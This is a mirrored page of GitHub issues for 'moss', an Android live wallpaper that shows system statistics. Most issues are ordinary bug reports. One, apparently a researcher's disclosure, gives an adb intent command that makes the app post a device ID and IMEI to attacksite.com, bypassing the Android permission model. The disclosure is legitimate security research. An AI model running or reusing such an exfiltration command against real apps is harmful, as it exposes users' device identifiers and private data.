Code Monkey home page Code Monkey logo

moss's People

Contributors

sly1029 avatar teneighty avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

moss's Issues

Some indicators are not working

Hi! Despite being using my current smartphone for nearly two years I have recently started to play with live wallpapers. Yours is simply awesome, thanks for your great work. However, in my particular case at least, some indicators are not working. CPU usage is shows always 0%, RAM amount is not the same shown in the system settings, Networking does not show any activity, and in the processes CPU usage shows NaN or Infinite. I'm aware that it could be my phone's fault, is a Sony Xperia Tipo. I attach a screenshot in case this helps.
screenshot_2015-03-04-16-35-00
Thank you!

Unable to load custom mossrc

In Settings > Overrides > Custom File, I can point to a custom config file at /sdcard/mossrc. Returning to Set Wallpaper, doesn't change anything, however, and the Basic Configuration remains loaded. I tried Settings > Reload after pointing to the custom config but again the Basic Configuration remains but without the overrides.

Please let me know if there is something else that needs to be specified in order to load a custom config.

Many thanks, Moss is an essential tool for those of us who constantly need to know what is going on! I use conky on my desktop.

ui brick

when trying to enable moss (activate the wallpaper) on an nexus s running android (cyanogenmod) 4.4.4, the device hangs on trying to load the ui.

Inter-application vulnerability

Hi there,

This issue report is a part of a research. We have found that your application is vulnerable to inter-application communication. It can be replicated as follows:

adb shell 'am start "intent://attacksite.com/post.php?deviceid=123&imei=0123#Intent;scheme=http;action=android.intent.action.VIEW;category=android.intent.category.BROWSABLE;component=org.mosspaper/.PackageListActivity;end"'

By automating this, an attacking app that does not have INTERNET permission can post sensitive information to the attacker's website.

The problem is in PackageListActivity class where the ACTION of the coming Intent is checked in handleIntents() method and then internet is accessed on the URL in download() method of PackLoaderTask class which effectively lets an attacker to publish sensitive data to a given URL.

A given context is as follows: a malicious app without INTERNET permission but with other permissions (for example reading SMS) can use your application's INTERNET permission to pass sensitive data.

Can you please confirm this?

Thank you,
Biniam

Config file

Where is the config file located? I so happy that I found this. Thanks for developing it.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.